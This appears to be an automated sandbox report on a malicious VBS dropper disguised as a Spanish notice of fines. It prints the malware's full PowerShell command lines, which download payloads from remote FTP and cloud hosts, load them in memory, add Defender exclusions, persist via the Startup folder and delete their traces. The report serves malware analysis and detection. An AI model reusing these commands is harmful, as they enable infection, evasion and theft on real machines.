???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Fo???YwBC???GM???YQ???k???C??????XQBd???Fs???ZQB0???Hk???QgBb???Ds???Jw???l???Ek???a???Bx???FI???W??????l???Cc???I??????9???C??????W???BQ???FU???dQBo???CQ???Ow???p???C??????ZwBT???Ho???QwBC???Gw???J??????g???Cg???ZwBu???Gk???cgB0???FM???Z???Bh???G8???b???Bu???Hc???bwBE???C4???egB0???Hg???a??????k???C??????PQ???g???Gc???UwB6???EM???QgBs???CQ???Ow???4???EY???V???BV???Do???OgBd???Gc???bgBp???GQ???bwBj???G4???RQ???u???HQ???e???Bl???FQ???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Gc???bgBp???GQ???bwBj???G4???RQ???u???Ho???d???B4???Gg???J??????7???Ck???d???Bu???GU???aQBs???EM???YgBl???Fc???LgB0???GU???Tg???g???HQ???YwBl???Go???YgBP???C0???dwBl???E4???K??????g???D0???I???B6???HQ???e???Bo???CQ???Ow???p???Cg???ZQBz???G8???c???Bz???Gk???Z??????u???Ho???d???B4???Gg???J??????7???Ck???I??????n???HQ???e???B0???C4???MQ???w???Ew???T???BE???C8???MQ???w???C8???cgBl???HQ???c???B5???HI???YwBw???FU???LwBy???GI???LgBt???G8???Yw???u???HQ???YQBy???GI???dgBr???GM???cwBl???GQ???LgBw???HQ???ZgB??????DE???d???Bh???HI???YgB2???Gs???YwBz???GU???Z??????v???C8???OgBw???HQ???Zg???n???C??????K???Bn???G4???aQBy???HQ???UwBk???GE???bwBs???G4???dwBv???EQ???LgB6???HQ???e???Bo???CQ???I??????9???C??????ZwBT???Ho???Qw	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF848D63316	5_2_00007FF848D63316
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_00D2E170	15_2_00D2E170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_00D25AE8	15_2_00D25AE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_05EA0040	15_2_05EA0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_05EA9C18	15_2_05EA9C18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_05EA8D40	15_2_05EA8D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_05EA8D17	15_2_05EA8D17
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_05EAAEBB	15_2_05EAAEBB

Source: Oficio notificacion multas y sanciones.vbs

Initial sample: Strings found which are bigger than 50

Source: Process Memory Space: powershell.exe PID: 2748, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 1088, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5792, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7428, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7656, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.spre.troj.spyw.expl.evad.winVBS@38/30@4/4

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\x2.ps1

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5352:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7384:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\a388ab2ca3be4
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7436:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8156:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7620:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j2xvaybo.sc4.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs"

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9???Ds???KQ???g???Ck???I??????n???GU???dQBy???HQ???Jw???g???Cw???I???BY???F??????VQB1???Gg???J??????g???Cw???I??????n???Gg???d???B0???H??????cw???6???C8???LwBm???Gk???cgBl???GI???YQBz???GU???cwB0???G8???cgBh???Gc???ZQ???u???Gc???bwBv???Gc???b???Bl???GE???c???Bp???HM???LgBj???G8???bQ???v???HY???M??????v???GI???LwBk???GU???cwBj???GE???cgBn???GE???cw???t???GQ???Yw???0???GQ???Ng???u???GE???c???Bw???HM???c???Bv???HQ???LgBj???G8???bQ???v???G8???LwBl???G4???dgBp???G8???cw???t???G4???dQBl???HY???bwBz???C4???d???B4???HQ???PwBh???Gw???d??????9???G0???ZQBk???Gk???YQ???m???HQ???bwBr???GU???bg???9???GM???ZQ???2???Dk???M???Bh???DY???M??????t???Dc???O???Bl???GI???LQ???0???D??????MQBi???C0???YgBm???GM???Ng???t???DE???Z???Bj???Dg???Mg???1???GU???MQ???5???DQ???Yg???y???Cc???I??????o???C??????XQBd???Fs???d???Bj???GU???agBi???G8???Ww???g???Cw???I???Bs???Gw???dQBu???CQ???I??????o???GU???awBv???HY???bgBJ???C4???KQ???g???Cc???SQBW???EY???cgBw???Cc???I??????o???GQ???bwBo???HQ???ZQBN???HQ???ZQBH???C4???KQ???n???DE???cwBz???GE???b???BD???C4???MwB5???HI???YQBy???GI???aQBM???HM???cwBh???Gw???Qw???n???Cg???ZQBw???Hk???V???B0???GU???Rw???u???Ck???I???Ba???GM???QgBj???GE???J??????g???Cg???Z???Bh???G8???T??????u???G4???aQBh???G0???bwBE???HQ???bgBl???HI???cgB1???EM???Og???6???F0???bgBp???GE???bQBv???EQ???c???Bw???EE???LgBt???GU???d???Bz???Hk???UwBb???Ds???KQ???g???Ck???I??????n???EE???Jw???g???Cw???I??????n???JMhOgCTISc???I??????o???GU???YwBh???Gw???c???Bl???FI???LgBn???FM???egBD???EI???b??????k???C??????K???Bn???G4???aQBy???HQ???Uw???0???DY???ZQBz???GE???QgBt???G8???cgBG???Do???OgBd???HQ???cgBl???HY???bgBv???EM???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Fo???YwBC???GM???YQ???k???C??????XQBd???Fs???ZQB0???Hk???QgBb???Ds???Jw???l???Ek???a???Bx???FI???W??????l???Cc???I??????9???C??????W???BQ???FU???dQBo???CQ???Ow???p???C??????ZwBT???Ho???QwBC???Gw???J??????g???Cg???ZwBu???Gk???cgB0???FM???Z???Bh???G8???b???Bu???Hc???bwBE???C4???egB0???Hg???a??????k???C??????PQ???g???Gc???UwB6???EM???QgBs???CQ???Ow???4???EY???V???BV???Do???OgBd???Gc???bgBp???GQ???bwBj???G4???RQ???u???HQ???e???Bl???FQ???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Gc???bgBp???GQ???bwBj???G4???RQ???u???Ho???d???B4???Gg???J??????7???Ck???d???Bu???GU???aQBs???EM???YgBl???Fc???LgB0???GU???Tg???g???HQ???YwBl???Go???YgBP???C0???dwBl???E4???K??????g???D0???I???B6???HQ???e???Bo???CQ???Ow???p???Cg???ZQBz???G8???c???Bz???Gk???Z??????u???Ho???d???B4???Gg???J??????7???Ck???I??????n???HQ???e???B0???C4???MQ???w???Ew???T???BE???C8???MQ???w???C8???cgBl???HQ???c???B5???HI???YwBw???FU???LwBy???GI???LgBt???G8???Yw???u???HQ???YQBy???GI???dgBr???GM???cwBl???GQ???LgBw???HQ???ZgB??????DE???d???Bh???HI???YgB2???Gs???YwBz???GU???Z??????v???C8???OgBw???HQ???Zg???n???C??????K???Bn???G4???aQBy???HQ???UwBk???GE???bwBs???G4???dwBv???EQ???LgB6???HQ???e???Bo???CQ???I??????9???C??????ZwBT???Ho???Qw
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$hxtz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $hxtz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$hxtz.dispose();$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $hxtz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '2b491e528cd1-6cfb-b104-be87-06a096ec=nekot&aidem=tla?txt.soveun-soivne/o/moc.topsppa.6d4cd-sagracsed/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $huUPX , 'true' ) );};"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c mkdir "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c del "C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C Y /N /D Y /T 1 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9???Ds???KQ???g???Ck???I??????n???GU???dQBy???HQ???Jw???g???Cw???I???BY???F??????VQB1???Gg???J??????g???Cw???I??????n???Gg???d???B0???H??????cw???6???C8???LwBm???Gk???cgBl???GI???YQBz???GU???cwB0???G8???cgBh???Gc???ZQ???u???Gc???bwBv???Gc???b???Bl???GE???c???Bp???HM???LgBj???G8???bQ???v???HY???M??????v???GI???LwBk???GU???cwBj???GE???cgBn???GE???cw???t???GQ???Yw???0???GQ???Ng???u???GE???c???Bw???HM???c???Bv???HQ???LgBj???G8???bQ???v???G8???LwBl???G4???dgBp???G8???cw???t???G4???dQBl???HY???bwBz???C4???d???B4???HQ???PwBh???Gw???d??????9???G0???ZQBk???Gk???YQ???m???HQ???bwBr???GU???bg???9???GM???ZQ???2???Dk???M???Bh???DY???M??????t???Dc???O???Bl???GI???LQ???0???D??????MQBi???C0???YgBm???GM???Ng???t???DE???Z???Bj???Dg???Mg???1???GU???MQ???5???DQ???Yg???y???Cc???I??????o???C??????XQBd???Fs???d???Bj???GU???agBi???G8???Ww???g???Cw???I???Bs???Gw???dQBu???CQ???I??????o???GU???awBv???HY???bgBJ???C4???KQ???g???Cc???SQBW???EY???cgBw???Cc???I??????o???GQ???bwBo???HQ???ZQBN???HQ???ZQBH???C4???KQ???n???DE???cwBz???GE???b???BD???C4???MwB5???HI???YQBy???GI???aQBM???HM???cwBh???Gw???Qw???n???Cg???ZQBw???Hk???V???B0???GU???Rw???u???Ck???I???Ba???GM???QgBj???GE???J??????g???Cg???Z???Bh???G8???T??????u???G4???aQBh???G0???bwBE???HQ???bgBl???HI???cgB1???EM???Og???6???F0???bgBp???GE???bQBv???EQ???c???Bw???EE???LgBt???GU???d???Bz???Hk???UwBb???Ds???KQ???g???Ck???I??????n???EE???Jw???g???Cw???I??????n???JMhOgCTISc???I??????o???GU???YwBh???Gw???c???Bl???FI???LgBn???FM???egBD???EI???b??????k???C??????K???Bn???G4???aQBy???HQ???Uw???0???DY???ZQBz???GE???QgBt???G8???cgBG???Do???OgBd???HQ???cgBl???HY???bgBv???EM???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Fo???YwBC???GM???YQ???k???C??????XQBd???Fs???ZQB0???Hk???QgBb???Ds???Jw???l???Ek???a???Bx???FI???W??????l???Cc???I??????9???C??????W???BQ???FU???dQBo???CQ???Ow???p???C??????ZwBT???Ho???QwBC???Gw???J??????g???Cg???ZwBu???Gk???cgB0???FM???Z???Bh???G8???b???Bu???Hc???bwBE???C4???egB0???Hg???a??????k???C??????PQ???g???Gc???UwB6???EM???QgBs???CQ???Ow???4???EY???V???BV???Do???OgBd???Gc???bgBp???GQ???bwBj???G4???RQ???u???HQ???e???Bl???FQ???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Gc???bgBp???GQ???bwBj???G4???RQ???u???Ho???d???B4???Gg???J??????7???Ck???d???Bu???GU???aQBs???EM???YgBl???Fc???LgB0???GU???Tg???g???HQ???YwBl???Go???YgBP???C0???dwBl???E4???K??????g???D0???I???B6???HQ???e???Bo???CQ???Ow???p???Cg???ZQBz???G8???c???Bz???Gk???Z??????u???Ho???d???B4???Gg???J??????7???Ck???I??????n???HQ???e???B0???C4???MQ???w???Ew???T???BE???C8???MQ???w???C8???cgBl???HQ???c???B5???HI???YwBw???FU???LwBy???GI???LgBt???G8???Yw???u???HQ???YQBy???GI???dgBr???GM???cwBl???GQ???LgBw???HQ???ZgB??????DE???d???Bh???HI???YgB2???Gs???YwBz???GU???Z??????v???C8???OgBw???HQ???Zg???n???C??????K???Bn???G4???aQBy???HQ???UwBk???GE???bwBs???G4???dwBv???EQ???LgB6???HQ???e???Bo???CQ???I??????9???C??????ZwBT???Ho???Qw	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$hxtz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $hxtz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$hxtz.dispose();$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $hxtz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '2b491e528cd1-6cfb-b104-be87-06a096ec=nekot&aidem=tla?txt.soveun-soivne/o/moc.topsppa.6d4cd-sagracsed/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $huUPX , 'true' ) );};"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c mkdir "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c del "C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C Y /N /D Y /T 1 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
